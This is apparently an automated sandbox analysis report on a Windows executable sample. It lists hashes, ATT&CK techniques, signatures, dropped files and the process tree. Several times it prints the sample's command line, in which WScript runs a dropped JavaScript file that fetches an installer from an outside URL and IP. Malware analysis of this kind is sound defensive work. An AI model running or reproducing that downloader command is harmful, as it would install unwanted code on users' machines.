dd652769cce2abc3bec23b66d6e096adfea604bd21a8885b367511ae42990024

Analysis

max time kernel
119s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
29/05/2024, 03:09

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe
Size

184KB
MD5

7f4fe19c1ea7bf77485cc3eabc6bd529
SHA1

be6b0d7bb83e415b487ac9d832a041f4104a981e
SHA256

dd652769cce2abc3bec23b66d6e096adfea604bd21a8885b367511ae42990024
SHA512

90b6f7dd6c12c61e09f889817543001bdb1ea5cee8b5a1a34824275cf4151dff75af0072ba8cfcba58bf25a81518bca8912fd581e5da1814be038661c8f9a1a1
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3w:/7BSH8zUB+nGESaaRvoB7FJNndn1

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	3032	WScript.exe
8	3032	WScript.exe
10	3032	WScript.exe
12	2428	WScript.exe
13	2428	WScript.exe
15	792	WScript.exe
16	792	WScript.exe
19	1932	WScript.exe
20	1932	WScript.exe
22	2240	WScript.exe
23	2240	WScript.exe
27	2240	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2660 wrote to memory of 3032	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	28
PID 2660 wrote to memory of 3032	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	28
PID 2660 wrote to memory of 3032	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	28
PID 2660 wrote to memory of 3032	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	28
PID 2660 wrote to memory of 2428	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	30
PID 2660 wrote to memory of 2428	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	30
PID 2660 wrote to memory of 2428	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	30
PID 2660 wrote to memory of 2428	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	30
PID 2660 wrote to memory of 792	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	32
PID 2660 wrote to memory of 792	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	32
PID 2660 wrote to memory of 792	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	32
PID 2660 wrote to memory of 792	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	32
PID 2660 wrote to memory of 1932	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	36
PID 2660 wrote to memory of 1932	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	36
PID 2660 wrote to memory of 1932	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	36
PID 2660 wrote to memory of 1932	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	36
PID 2660 wrote to memory of 2240	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	38
PID 2660 wrote to memory of 2240	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	38
PID 2660 wrote to memory of 2240	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	38
PID 2660 wrote to memory of 2240	2660	7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7f4fe19c1ea7bf77485cc3eabc6bd529_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2660
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf90BB.js" http://www.djapp.info/?domain=HKcGoRyflV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf90BB.exe
  2⤵
  - Blocklisted process makes network request
  PID:3032
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf90BB.js" http://www.djapp.info/?domain=HKcGoRyflV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf90BB.exe
  2⤵
  - Blocklisted process makes network request
  PID:2428
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf90BB.js" http://www.djapp.info/?domain=HKcGoRyflV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf90BB.exe
  2⤵
  - Blocklisted process makes network request
  PID:792
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf90BB.js" http://www.djapp.info/?domain=HKcGoRyflV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf90BB.exe
  2⤵
  - Blocklisted process makes network request
  PID:1932
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf90BB.js" http://www.djapp.info/?domain=HKcGoRyflV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf90BB.exe
  2⤵
  - Blocklisted process makes network request
  PID:2240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
a5c01f337cdeb7cfea1fa9537953788a

SHA1
4a424c3abf07b4169648765cec1e1d3462edd3a7

SHA256
f226294a247fb8da33cf1868a83ee262f7831305b86f5f3dd5805fbc9188d042

SHA512
9e48d9738c65450423ae773856c4d708bbffb48e0b047cf2dec0504bf8becd0f75a95587efa94743525fb3e4f6364760a1cab755e91c0b59fd6c97714b143ede

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
2e9efe393ad731eac576ed920848211e

SHA1
9d49ffb0179783aa55ddccaf2b114ab6a22650e1

SHA256
fbf01c480bfcaa14b17d19f1af5c441b481c15be8f2493ab709717a16032d7db

SHA512
1913afce094341bcf8cc5849006f66dd4cd9507288d3012aad0ba5c3810ef937b615cd67818bf4485e8a3a6324d752b8cdb194411c324a86b5fa9831c7e011d6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cf7236a3e146c4611597d1e16f464849

SHA1
ca4bb8debeb5b19df79b26f787fa6fbbbc25c11f

SHA256
bf41721756e5cd5281cc3f9feea8c8ca1b14800bb90d1bd4ffcf50914f1695f1

SHA512
d33c5b565931073e0bdbc3e3a7c27b1f05ebd52acae157bfa5e0631416f990be940ca1b388d00e518949a3ba62d05c47258daf49b34aa79d1842ca1065b0bf29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
889652737a0c11e360fe568d5772a28a

SHA1
6a99d766eb897166d532bbd43add5ccc11ed899f

SHA256
190ba63359d39f896c87dca5a0dcf8764da95d4e1ba6d1a7ec0f33954a1809ea

SHA512
1d0c4f8609efb1f052c258d4f1a87bfa350a812460e54b3e1154270ab58124c67b64996c5161812ac5eaa29408107e5eaef78f34f6ea4fa631af9fdafffe000a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
40KB

MD5
feb5a73fa57b9656da908ed23565fca0

SHA1
d6fb539aef25905a8b95d23b964801875bcf0db7

SHA256
88e71dae9d4308e30e08addcdc863d7760d75471c71e3a29e4390e0815e853b2

SHA512
ee52298cb4655c69e63c60c0036cad00312f8fc900c10ebfca05b8900992b96723eb86c6685a42b70e2380d1e41b244edad37f5df952f1230590371ca87b10cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
40KB

MD5
b983a025543c149de7cc3a8757aaa5b1

SHA1
c8bfbb63aa2c9d59d90b58ba223ffe8436bca602

SHA256
68a41b82947d2ec8abab66fcc4b43622fe0a59966a5a027afb8f47691a51a528

SHA512
9bd8da4891d622cd6eed3f40f17347818be10be981df432ab0ec9bf2fa286fb213d2589f921068152f1ee30e1b8a1c803a94fb6c8aca3ccd6b588a9665be04c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
2ab9149ea2782b0963310d0d2c9b132c

SHA1
1dd017ec374d53a9c9c107cd434a63302ddf3dc3

SHA256
c971c3aea98226f9224e326c1d18d4f7562d1a1d5ac4545076159324f72a1f43

SHA512
bcd5381bb4e45d38becb5ddb94eb60217ae34b3c13d46959081b7d943be8fb5d0282ee10eb42af7910c3137ac14b32eaa90c9a67fcec6c6bff3c5937875ac943

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
40KB

MD5
3b9d3931a6874d13d812354744aa6d65

SHA1
29aaf75ad96a21910e743ee864b64d28d7d8108b

SHA256
6d89b2d3eaf058a0fc2527b78df3b24ec0d5db61da760f90cfd09512a042e48d

SHA512
1e6b9afc49474ef39a95e5d68110eff50c30d9d7b5d6f2a6c3706eb460f80d51fc894810357b32590fba3d0e65b9942ea0be3e03f24e2993f2c1eb48dfc26a2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD807.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEFEB.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf90BB.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0R6LSMY0.txt

Filesize
177B

MD5
e10e0e5cb888c3d84fedd1785af22a75

SHA1
1742fd762a22913b88137dad5fcfb3efaa6574b0

SHA256
abae723f93c2c83af100d14cc028038b1ab943fdf04ad95e7e2942a147ae2c21

SHA512
526626774637be3d3dbcdb8b35efe37ff0ce59b9b6cd8df0d118179aaada0b7a8f9171de02d6a74d4348003e561a2cd65114e73a2a2ecdd166a6ea4da26763b8

Download Submit